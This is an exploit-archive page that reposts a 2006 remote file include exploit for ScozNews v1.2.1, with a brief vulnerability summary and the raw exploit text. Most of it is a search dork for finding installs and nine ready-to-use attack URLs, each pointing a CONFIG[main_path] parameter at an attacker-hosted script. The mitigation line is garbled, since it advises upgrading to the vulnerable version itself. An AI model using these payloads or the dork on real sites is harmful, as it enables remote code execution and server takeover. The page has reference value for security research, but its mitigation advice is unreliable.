header-logo
Suggest Exploit
vendor:
ScozNews
by:
Kacper (Rahim)
9,3
CVSS
HIGH
Remote File Include
98
CWE
Product Name: ScozNews
Affected Version From: v1.2.1
Affected Version To: v1.2.1
Patch Exists: YES
Related CWE: N/A
CPE: a:scoznet:scoznews
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

ScozNews v1.2.1 – Remote File Include

ScozNews v1.2.1 is vulnerable to a remote file include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

Upgrade to the latest version of ScozNews v1.2.1 or later.
Source

Exploit-DB raw data:

################ DEVIL TEAM THE BEST POLISH TEAM #################
#ScozNews v1.2.1 - Remote File Include
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#dork: "(Powered By ScozNews)"
##################################################################

http://www.site.com/[news_path]/sources/functions.php?CONFIG[main_path]=[evil_scripts]


http://www.site.com/[news_path]/sources/template.php?CONFIG[main_path]=[evil_scripts]


http://www.site.com/[news_path]/sources/news.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/help.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/mail.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/Admin/admin_cats.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/Admin/admin_edit.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/Admin/admin_import.php?CONFIG[main_path]=[evil_scripts]

http://www.site.com/[news_path]/sources/Admin/admin_templates.php?CONFIG[main_path]=[evil_scripts]

###################################################################
#Elo ;-)

# milw0rm.com [2006-05-17]

Navigation

Suggest Exploit

Services By CQR